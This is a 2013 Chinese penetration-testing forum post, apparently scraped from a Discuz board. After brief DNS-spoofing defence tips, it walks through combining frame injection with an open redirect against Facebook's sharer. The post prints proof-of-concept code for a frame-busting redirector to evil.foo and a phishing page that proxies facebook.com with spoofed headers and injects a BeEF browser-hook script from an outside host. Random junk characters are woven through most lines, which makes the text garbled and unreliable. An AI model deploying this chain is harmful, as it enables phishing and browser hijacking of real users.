找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 网站框架注入漏洞到非法重定向
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2278|回复: 0
打印 上一主题 下一主题

网站框架注入漏洞到非法重定向

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-20 21:57:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以上就是一次成功的DNS欺骗
2 y4 M/ H4 y8 P2 ^; Z2 x2 n/ uDNS欺骗的危害是巨大的,我不说大家也都懂得,常见被利用来钓鱼、挂马之类的2 F* Y/ E4 l. g+ q" ]/ b9 k" @
* a( N5 Z2 X+ w3 Y0 [, D

& B2 J0 }# B+ x% `& z0×02.2 DNS欺骗的防范9 x0 K! G; L1 ~, Z

6 `  `- S+ S& X- o" tDNS欺骗是很难进行有效防御的,因为大多情况下都是被攻击之后才会发现,对于避免DNS欺骗所造成危害,本菜鸟提出以下建议
8 z8 W' H* o, N" M1.因为DNS欺骗前提也需要ARP欺骗成功。所以首先做好对ARP欺骗攻击的防范。
9 X; D0 B/ L& ^+ C) P1 x: C! z2.不要依赖于DNS,尽管这样会很不方便,可以使用hosts文件来实现相同的功能,Hosts文件位置:$ H! j, ?( f/ ?- W3 z5 c- v
   windows xp/2003/vista/2008/7 系统的HOSTS文件位置 c:\windows\system32\drivers\etc 用记事本打开即可进行修改。
6 {3 }/ G" L8 ~4 A' F( L3.使用安全检测软件定期检查系统是否遭受攻击
6 ]4 m) k6 B4 C* G) l2 U4.使用DNSSEC,DNSSEC详细介绍:http://baike.baidu.com/view/3421039.htm1 @! a$ w4 z8 ~) b. I
by: TaskKilL+ K$ h" f! q: V8 C5 K7 {
( J; J6 l8 m# h, L5 A! v+ v$ a* ^; Y
Windows live 翻译框架注入9 d6 H% L* z7 M6 l
$ P6 C8 W1 G3 c" F6 _6 t
http://www.windowslivetranslator ... evil.foo/bypass.php
7 M0 N1 X8 Z3 ]4 ~. v. C
6 f* N, c( f2 p, g : K+ J# |/ o, h6 u% r1 ^3 l( ^. ~
. C4 g# `1 L0 d( T* L
三、重定向描述 :
/ |+ t8 a& j6 R; g3 e, o: A; y9 p0 z& ?2 }( P5 S' R
  g  @  P4 z' v0 P" b% u

5 U; F1 I% C" X' X1 Q; @重定向漏洞允许一个邪恶的用户对一个网站重定向给受害者。主要攻击媒介的这种脆弱性是pishing。只有在远程Web服务器的权限可以重定向漏洞使用恶意脚本php,javascript, vbscript ,ajax (worm)。% S4 O/ J: s) e6 L; ~$ K

9 g7 y$ x  ^9 U" C- p  n$ \最常见的攻击媒介是体现在双重网址中:1 C1 V5 a$ m2 h- u3 T) g( K

7 I  ~" ~7 i! D3 R+ yhttp://site.com/redirect?r=http://malicious_website.com
* z8 }0 K% c5 O  i" h8 f& D# b5 q- k! p" ~
" x' ]( L2 I' H5 f+ K8 F% Z/ K
& d- h4 T4 b4 D$ g. Z
四、利用方式,结合重定向框架注入vulnz:
4 H; U' g  z/ ^  Y6 t0 V% u4 n$ F9 `. e

! b5 B" u! M) K" R) G% @5 L5 M2 i$ e" \& H* \
先进的重定向和框架注入组合攻击:2 B1 E. c7 V4 j7 X! r
( F) A2 b5 Y) O( V% @. P
/-----------/ /-----------/ /-----------/ /-----------/ /-----------/
' X3 K9 Z- I( [' U/ l2 a1 t7 I5 _
* ?0 F( A  V; v|facebook ---| google ---| bypass.php|---| login.php ---| b e e f :& ~; @% @: K: T8 r% |0 ?3 j2 S
+ a7 P1 p+ n: d, F: z
\-----------\ \-----------\ \-----------\ \-----------\ \-----------\
6 I+ J# h; R; P, S; ^( U, S6 v: i( Q. |% B2 h$ M. l1 k2 U
Facebook的sharer.php的输入源可能看起来像这样的脚本:! y! ~% r, I6 v* J- x8 ]% Q/ c: a

% |1 d' [- X5 I* z8 A5 u( m+ ?+ r#########################################################################; ]; _, u; }! q
1 t: h+ l" w, Y, U/ U
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN"
- ^: W" m! z3 ]) W2 d+ s' e' h1 e/ l6 ?1 X) L( ]. o7 \2 O
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
! K& I  i0 I  p5 l- a
2 e; Z/ W, j; I6 n. g<html xmlns="http://www.w3.org/1999/xhtml">
" }: T2 g3 S8 s$ y2 V& Y7 P& {
1 i) I9 e2 y3 S<html>
3 m* x( x- Y4 _2 x, W& v5 H' |" o
/ ^* D0 ^2 x* Y( X9 G' M<head>
, M/ `0 w& X" i  v: ?  i1 @5 ?2 J$ Y; u8 I/ x
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
, s, r* `3 b3 W* A$ ^, i8 x4 q
# h$ l- S& D0 X- V0 F: s1 u<title> Welcome in my-site-is-not-secure-now.w00t</title>
) k  x6 I( h. w( I& @# c6 `, G- o1 d# F9 C
</head>* j" Q. U% B- H+ u4 Y

6 \( J! z& N- w- Z) v6 c<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0">
6 [0 u0 X7 I4 b0 z1 y1 A7 s6 e$ p3 R+ ?
<frame src="navigation.htm" name="navigation" frameborder="yes" scrolling=""NO"
$ C0 R/ x# S( g5 S
. p$ m2 b2 }  x6 Ebordercolor="#0000CC" id="navigation">
0 s6 e4 L( ~' X4 \/ Y# l3 r0 ^/ h8 r, _5 `* C7 ~
<frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0" >
9 f; T( \1 j: L# V
" N+ `. W* ~2 H& O' c8 B- |: y<frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO"# R" N) a. e7 e( M+ Q7 p, k1 W9 x
3 i7 ^/ N* \2 l! v6 o
bordercolor="#000000" id="en-tete">5 f9 l, C" T) N7 Z" w. R
<frame src="<?php) S! u9 q5 g7 t+ f

) C5 V8 G" X  T3 ^6 X8 P+ F//secure code
. z  y  x4 _0 r: P6 ?( B+ P" e1 D) p/ V: ?4 c5 u
if(isset($_GET['iframe']))! h) s0 ?* D/ g
6 S* V2 x! y" j( |4 J. D& S8 S9 t# Y
{# a" Q- ]9 |( n- [

/ q" [) a, {5 s1 a2 K9 G  L$allowUrls = array("http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");
) x" `5 }8 t5 C% f
( m  ^, v" V) d! F9 _) P$ Xif(in_array($_GET['iframe'], $allowUrls))
8 I0 `# T) ]/ c* k
% X( y, p; n8 }5 N0 F) E9 V& aecho $_GET['iframe']; // 如果IFRAME中允许有一个网址( _5 |3 t4 Q! s8 M8 K0 c

& @8 O  x0 A) C7 T4 Y- N& uelse // 为了显示主页(或一个错误页面)
' O7 j7 W% Z. d
% @" u. \/ J  aecho "accueil.htm";: ]0 `! c) T  z2 G
. K4 Q" ?+ Q" G! Y# J$ Z( k/ K
}
' q! p5 y; N1 P) c" X0 i9 s, \
* m: J7 ]5 J$ C. O8 }( u8 c7 K8 e+ jelse // !!!
: V6 M7 D1 X+ ^0 g
4 c1 ]$ b0 M6 N2 P3 y  Oecho "accueil.htm";, |8 E$ p. @% P

5 ]; _/ S% F. F7 n9 l$ [; Z?>" name="corps" scrolling="auto" id="corps">
, K  v) s, u/ n( h, `# X* e8 v# R
8 R: `9 V3 M  |, L' c" y</frameset>
, z6 X* Z5 L  U8 Y& R- t
4 W, l7 \* J" Q. W</frameset><noframes>No frames </noframes>. m$ }  h. S; X

! P. S; g1 [& m! _8 H" z</html>
8 \9 _: y0 z4 Q7 {+ h2 T0 F4 m
; ~1 w! v; Z2 i* m! [#########################################################################
& u: f0 H$ V+ B- }, x
  w; {* }6 A3 S' O/ |  @在Facebook中变换恶意网址链接像这样(sharer.php script):
. @' V& B: ]8 ?" E9 S3 Z3 n( ]: [6 S3 P2 C: O8 }, W4 @
http://www.facebook.com/ext/shar ... p;h=Crew&u=p3lo
8 B6 B" U3 b& l% e8 h+ g8 D$ o2 C' D5 ]+ k/ r
和上面的链接Facebook的概况出现像这样:
. t$ j8 r5 |" m
+ y0 r' `3 P, f- L" c, _' r&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&" R& l9 X# @3 i; A  I" p& r! K

& k/ `" q) I" K图片搜索结果& [; Z4 J) R% I" H4 X
' o( Q4 M7 F0 W, C1 O- [
http://www.google.fr/imgres?imgurl=http://fake_url...
2 ~8 Y; u& {9 K7 y: P0 T5 }# G1 F6 s  ~7 C2 v, g) l' @
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
  g" P  g8 U* `/ X& J: Q
( T' i6 [. p/ S2 w5 Y现在来看看我的成批输出转换程序(PoC)重定向脚本(bypass.php):
! Z' ]9 g1 W+ W1 j) V, _7 M* Y
  r+ N" ]9 P7 i& N+ Z* T' J###########################################################################& V2 n8 O7 p% O! C) V; J' u) |; I
- Q' Q( L; F) Q- a% i0 X" \
<head>
3 _* U+ S& K! D! A+ d" C( c! X, l& t( r" x3 A5 o! z
<meta http-equiv="Content-Language" content="it">
# P, \! L0 T# d
0 f3 R3 L- n% Q5 {<SCRIPT LANGUAGE="JavaScript">
  F; K: n8 ]( o: n$ t5 F$ j* O: K0 d8 e, Y! B- f
if (top.frames.length!=0) top.location=self.document.location;( Q6 l% z- m  v% W
, }, y* A3 P7 Y+ [$ G
</SCRIPT>
- R. l& @$ v6 {1 m, O+ B. Z3 {
( g+ t5 E  p9 t+ j4 l4 E' r) B<title>fb redirector PoC by Czy</title>
: t7 G" {, T- y' P# i* H
2 y6 \# M* M" y2 H6 Z</head>1 w1 q  V: _4 M4 X

1 U# s9 z0 Q  `1 H  I* g<body bgcolor="#99FF66">6 G/ r, A3 w7 D' V+ `0 T
) ], z5 x# J7 T1 _8 z
第一个脚本包含在head,允许杀死第一个框架的有效载荷,URL重定向到self.document.location。
! V9 z9 H0 q0 v1 o: b* f第二个脚本允许重定向我的网页上,以先进的pishing页面。) |. J: V7 x1 [- v8 z. P8 g- C! w% Z

. g, b' _1 ^3 C<br>( U  h4 k8 a" N1 d+ P" v4 s

/ X1 P& M' D" q& p<br><br>
- |7 p7 G4 ?) J+ X  e, e
& P. w. s9 \0 ?</body>- K" Z3 V4 b; b8 m1 T8 }; Z( m

( ]3 E1 u# |- @0 ^$ A8 X<br><br><script>document.location="http://evil.foo/login.php";</script><br>
; K7 q! O. J  X" {( n2 _
3 l3 L: h; J& i###############################################################################/ J# B. e( L# K2 t  a5 f: [
+ t# H0 E+ c. j, I# v
这是先进重定向pishing页面的来源 (login.php):
0 R8 E* o2 Z  A* A2 N, {. _6 h2 M3 W# X1 [# A0 R; x
###############################################################################/ W1 [+ Y4 P) J* V7 i* k, D4 y

( f! J, G% J0 u<?php
% I0 F1 J0 F+ Y; S8 x) i- n0 v
# A. Y% ]4 b* b) ?, m//by Czy
# x* Y; _  k  [) v! }' c/ R6 l8 b4 \
$referer=”http://www.facebook.com/”;8 [. C+ t: P* J; u  k( |- s
5 S  R2 c. Q$ z4 N0 q; H" I
// spoofing FireFox 2.0
& Z' d0 f0 Q$ `9 i$ T2 f
8 k$ G2 c$ V* v; E& x& v; \, ~2 D$useragent=”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1?;
* g+ ~9 t% F3 u: g8 p" Y8 g1 E. G7 _( |0 [# i
$ch = curl_init();/ A3 {; z. [4 ]8 r5 t: _% y  W
; j6 P3 j- ~! P# F& p3 w
curl_setopt ($ch, CURLOPT_URL, "http://www.facebook.com/");
; M0 M- M3 ?% S* y" X% Z9 f; L
curl_setopt ($ch, CURLOPT_HEADER, 0);/ ~* z9 o) d5 s- k. q
5 e) D+ x0 t7 x) d( Y& Y, O
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);3 a8 b) Q7 L0 r* x* ]' N

; Y7 h' d7 u- [$ ?5 k& B1 P1 t' t/ d6 wcurl_setopt($ch, CURLOPT_REFERER, $referer);7 u( |2 I7 ^* m# [6 w% |( {

6 _" M" t, ]" t- l* Qcurl_exec ($ch);4 G: c. Y+ q) B5 D% n. t
, |* q. p/ X  p/ _
curl_close ($ch);% |8 p  z" r; C

8 a8 g7 g) \  x, [, ~?>
3 h7 `  B- [: A5 @* s4 w
1 B8 X  ^9 |! h( O- {9 s<script src=”http://beefsite/beef/hook/beefmagic.js.php”></script>  x- I1 k+ d/ y2 n* @/ `
$ j3 n% w) l8 s5 U
###############################################################################
8 ?2 t3 }5 z* U% M% o% `
1 ], s  D2 r. K, z五、尾声:
" E  l+ b7 m; `+ v% b
* f; ~+ k% H- W9 n( L9 n& V经过长期时刻的研究,个人认为最好的方式来纠正这些漏洞是保证用户离开该网页和网站域名的重定向页面。
5 y4 m# y' L; {9 t- v8 k
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表